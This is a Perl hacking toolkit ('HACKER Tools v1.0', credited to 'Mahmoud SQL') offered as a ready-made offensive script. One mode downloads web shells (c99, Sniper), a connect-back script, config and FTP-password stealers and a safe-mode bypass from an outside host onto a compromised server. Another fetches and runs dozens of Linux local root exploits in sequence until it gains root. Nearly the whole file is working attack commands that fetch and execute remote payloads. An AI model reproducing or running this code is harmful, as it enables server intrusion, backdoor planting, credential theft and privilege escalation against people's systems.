#!/usr/bin/perl
print "                      HACKER TOOLS V 1.0 # Linux              \n";
print "   ################## Priv8 For My Friends Only ##############\n";
print "   ###########################################################\n";
print "   ##            HACKER Tools  v 1.0 By Mahmoud SQL         ##\n";
print "   ##   Author   :      { Mahmoud SQL }                     ##\n";
print "   ##   Country  :      { Palestine }                       ##\n";
print "   ##   Email    :      { SQL{at}Live{dot}se }              ##\n";
print "   ##   Website  :      { http://Team-SQL.com/cc }          ##\n";
print "   ###########################################################\n";
print "   ################## Priv8 For My Friends Only ##############\n";
print "   #    For My Friends: Mr.Danger & Mr SohayL & TnT HACKER   #\n";
print "   #       SyRiAn_34G13  Sniper Ip & Team SQL Member         #\n";
print "   #                       Mahmoud SQL                       #\n";
print "   #    Hello My Name Is Mahmoud Im From Palestine           #\n";
print "   #    Tool Work: Tools Maker & Bypass System & Read Config #\n";
print "   #     > R00t Linux Server < & Connect Back                #\n";
print "   #    Note:For Any Tools UserName : Mahmoud Password :SQL  #\n";
print "   #                        SQL Coder                        #\n";
print "   ###########################################################\n";
print "   Usage perl HACKER.pl S          Tools Maker                \n";
print "   Usage perl HACKER.pl Q          Bypass System              \n";
print "   Usage perl HACKER.pl M          R00t Linux Server 2003-2009\n";
print "                                                              \n";
print "   ###########################################################\n";
print "   
                         #####       ######     #
                         #           #    #     #
                         #   Mahmoud #    #     #  C0d3R
                         #####       #    #     #  
                          S  #       # Q  #     #   L
                             #       #    #     #
                         #####       ######     #######
                                         #
                                          # 
                 \n";
$CommandTimeoutDuration = 60;

if ($ARGV[0] =~ "S" ) 
{
system("uname -a");
print "                                                  \n";
system("pwd");
print "                                                  \n";
system("id");
print "                                                  \n";
system("mkdir SQL");
print "    SQL File Has Created\n";
system("cd SQL");
print "          cd SQL      \n";
system("pwd");
print "                                                  \n";
print "                                                  \n";
print "                                                  \n";
system("wget http://mahmoud-soft.com/HACKER/MySQL.txt");
system("mv MySQL.txt MySQL.php");
print "MySQL.php Has Been Created And Ready For Use To Access Databases\n";
system("wget http://mahmoud-soft.com/HACKER//c99.txt");
system ("mv c99.txt c99.php");
print "Shell c99 Has Been Created And Ready For Use\n";
system("wget http://mahmoud-soft.com/HACKER//php.txt");
system("mv php.txt php.ini");
print "php.ini File Has Been Created and Bypass The Safe Mode !\n";
system("wget http://mahmoud-soft.com/HACKER/sym4.txt");
system("mv sym4.txt sym4.php");
print "Sym4 Tool Has Been Created And Ready For Use !\n";
system("wget www.mahmoud-soft.com/HACKER/Mahmoud.txt");
system("mv Mahmoud.txt Mahmoud.php");
print "Mahmoud.php Has Been Ready For Use !!! I Did Make This File To Bypass the server and make new perl with .htacess  for write cmds\n";
system("wget www.mahmoud-soft.com/HACKER/Sniper.txt");
system("mv Sniper.txt Sniper-Shell.php");
print "Sniper shell Has Been Created and Ready For Use\n";
system("wget www.mahmoud-soft.com/HACKER/svt.txt");
system("mv svt.txt svt.php");
print "Svt Has Been Created For Read Config By Sym4 link\n";
system("wget www.mahmoud-soft.com/HACKER/Team-SQL.txt");
system("mv Team-SQL.txt Team-SQL.php");
print "Team SQL.php Has Been Created And Ready For change vb indexs and faq.php \n";
system("wget www.mahmoud-soft.com/HACKER/back.txt");
system("mv back.txt back.pl");
print "back.pl Has Been Ready For Use To Connect Back to The Server\n";
system("wget www.mahmoud-soft.com/HACKER/MahmoudHere.txt");
system("mv MahmoudHere.txt MahmoudHere.php");
print "MahmoudHere Has Been Created And REady For Use ## This Tool Coded To Get config in The Server & Get Password Of ftp acounts\n";
system("wget www.mahmoud-soft.com/HACKER/cpanel.txt");
system("mv cpanel.txt cpanel.php");
print "cpanel.php Has Been Created And Ready For Use # Its For Try Get Cpanels on the server # workning on Linux Only #\n";
system("wget www.mahmoud-soft.com/HACKER/admin.txt");
system("mv admin.txt admin.pl");
system("chmod 755 admin.pl");
print "admin.pl perl File Hass Been Created \n";
system("wget www.mahmoud-soft.com/HACKER/joomla.txt");
system("mv joomla.txt joomla.php");
print "joomla.php Has Been Created And Ready For Use # You can change Password Of administrator By The config by this tool\n";
system("wget www.mahmoud-soft.com/HACKER/wp-fuck.txt");
system("mv wp-fuck.txt wp-fuck.php");
print "Done ...\n";
system("wget wwww.mahmoud-soft.com/HACKER/mojreem2008.txt");
system("mv mojreem2008.txt mojreem.php");
print "Done ...\n";

print "All Tools Has Been Created And Ready In Folder Mahmoud # write Mahmoud after url http://localhost/Mahmoud ...\n";

}

if ($ARGV[0] =~ "Q" )
{
system("wget www.mahmoud-soft.com/HACKER/php.txt");
system("mv php.txt php.ini");
print "Done ....\n";
}

if ($ARGV[0] =~ "M" )
{
print "Exploit Num 1 Has Start Work\n";
system "pwd";
system "wget http://milw0rm.com/sploits/2009-wunderbar_emporium.tgz";
sleep(2);
print "Done ..\n";
system "tar -xf 2009-wunderbar_emporium.tgz";
sleep(2);
print "0k...\n";
system "cd wunderbar_emporium;./wunderbar_emporium.sh";
print "Done...\n";
system "uname -a;pwd;id;su";
print "Exploit Num 2 Has Start Work\n";
system"id";
system "pwd";
system "wget http://milw0rm.com/sploits/2009-proto_ops.tgz";
sleep(2);
print "Done...\n";
system "tar -xf 2009-proto_ops.tgz";
sleep(2);
print "Done...\n";
system "chmod 777 run.sh";
system "./run.sh";
print "Done...\n";
system "uname -a;pwd;id;su";
print "Exploit done...\n";
print "   ###########################################################\n";
print "   ###########################################################\n";
print "   ##             r00t Exploits By Mahmoud SQL              ##\n";
print "   ##   Author   : -(:: Mahmoud SQL ::)-                    ##\n";
print "   ##   FROM     : -(:: Palestine::)-                       ##\n";
print "   ##   MaiL     : -(:: SQL@Live.se ::)-                    ##\n";
print "   ##   homE     : -(:: http://team-sql.com/cc              ##\n";
print "   ###########################################################\n";
print "   ###########################################################\n";
# This Exploit Coded For Get Root For Servers 
# Only for linux
# Its Will Get Root For You If The Server Local Have Any Exploit From This Exploits
# This Perl Is Coded To Get Local r00t(s) from My Website And Test it on the server your working on
# One By One And Some Locals Need Gcc 
{
system("wget http://mahmoud-soft.com/HACKER/05");
system("chmod 777 05");
system("./05");
system("id;su;id;su;id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/2.6.9-55-2007-prv8");
system("chmod 777 2.6.9-55-2007-prv8");
system("./2.6.9-55-2007-prv8");
system("./2.6.9-55-2007-prv8");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/55");
system("chmod 777 55");
system("./55");
system("./55");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/12");
system("chmod 777 12");
system("./12");
system("./12");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/18");
system("chmod 777 18");
system("./18");
system("./18");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/krad2");
system("chmod 777 krad2");
system("./krad2");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/06");
system("chmod 777 06");
system("./06");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/7");
system("chmod 777 7");
system("./7");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/7-2");
system("chmod 777 7-2");
system("./7-2");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/8");
system("chmod 777 8");
system("./8");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/8a");
system("chmod 777 8a");
system("./8a");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/8bb");
system("chmod 777 8bb");
system("./8bb");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/8cc");
system("chmod 777 8cc");
system("./8cc");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/8x");
system("chmod 777 8x");
system("./8x");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/9");
system("chmod 777 9");
system("./9");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/77");
system("chmod 777 77");
system("./77");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/78");
system("chmod 777 78");
system("./78");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/ptrace-kmod");
system("chmod 777 ptrace-kmod");
system("./ptrace-kmod");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/elflbl");
system("chmod 777 elflbl");
system("./elflbl");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/kmod");
system("chmod 777 kmod");
system("./kmod");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/newlocal");
system("chmod 777 newlocal");
system("./newlocal");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/27799");
system("chmod 777 27799");
system("./27799");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget downloads.securityfocus.com/vulnerabilities/exploits/27704.c");
system("gcc 27704.c -o 27704");
system("chmod 777 27704");
system("./27704");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/k-rad3");
system("chmod 777 k-rad3");
system("./k-rad3 -t 1 -p 2");
system("id;su;id");
system("./k-rad3 -t 1 -p 3");
system("id;su;id");
system("./k-rad3 -t 1 -p 4");
system("id;su;id");
system("./k-rad3 -t 1 -p 5");
system("id;su;id");
system("./k-rad3 -t 1 -p 6");
system("id;su;id");
system("./k-rad3 -t 1 -p 7");
system("id;su;id");
system("./k-rad3 -t 1 -p 8");
system("id;su;id");
system("./k-rad3 -t 1 -p 9");
system("id;su;id");
system("./k-rad3 -t 1 -p 10");
system("id;su;id");
system("./k-rad3 -t 1 -p 11");
system("id;su;id");
system("./k-rad3 -t 1 -p 12");
system("id;su;id");
system("./k-rad3 -t 1 -p 13");
system("id;su;id");
system("./k-rad3 -t 1 -p 14");
system("id;su;id");
system("./k-rad3 -t-p 2");
system("id;su;id");
system("./k-rad3 -t-p 2");
system("id;su;id");
system("./k-rad3 -t-p 3");
system("id;su;id");
system("./k-rad3 -t-p 4");
system("id;su;id");
system("./k-rad3 -t-p 5");
system("id;su;id");
system("./k-rad3 -a -p 7");
system("id;su;id");
system("./k-rad3 -a -p 7");
system("id;su;id");
system("./k-rad3 -a -p 8");
system("id;su;id");
system("./k-rad3 -a -p 8");
system("id;su;id");
system("./k-rad3 -a -p 9");
system("id;su;id");
system("./k-rad3 -a -p 9");
system("id;su;id");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/pwned");
system("chmod 777 pwned");
system("./pwned");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/krad");
system("chmod 777 krad");
system("./krad -t 1 -p 2");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/r00t");
system("chmod 777 r00t");
system("./r00t");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/2.4.34");
system("chmod 777 2.4.34");
system("./2.4.34");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/lezr-km");
system("chmod 777 lezr-km");
system("./lezr-km");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/mremap_pte");
system("chmod 777 mremap_pte");
system("./mremap_pte");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/ong_bak");
system("chmod 777 ong_bak");
system("./ong_bak -10023411");
system("./ong_bak -10029");
system("./ong_bak -10023");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/ptrace24");
system("chmod 777 ptrace24");
system("./ptrace24");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/pwned3");
system("chmod 777 pwned3");
system("./pwned3");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/loginx");
system("chmod 777 loginx");
system("./loginx");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/myptrace");
system("chmod 777 myptrace");
system("./myptrace");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/x");
system("chmod 777 x");
system("./x");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/crond");
system("chmod 777 crond");
system("./crond");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://ircdzone.com/wp-content/uploads/2008/11/2009-wunderbar_emporium.tgz");
system("tar -vzxf 2009-wunderbar_emporium.tgz");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/brk");
system("chmod 777 brk");
system("./brk");
system("id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
system("wget http://mahmoud-soft.com/HACKER/brk2");
system("chmod 777 brk");
system("./brk2");
system("id;su;id;su;id;su;id");
print "if Your Id up is R00t Then Stop The Perl By Contrl+ C\n";
print "Exploit Has Finsh Work # Write Id For Know if you got root or no #  \n";
}
}
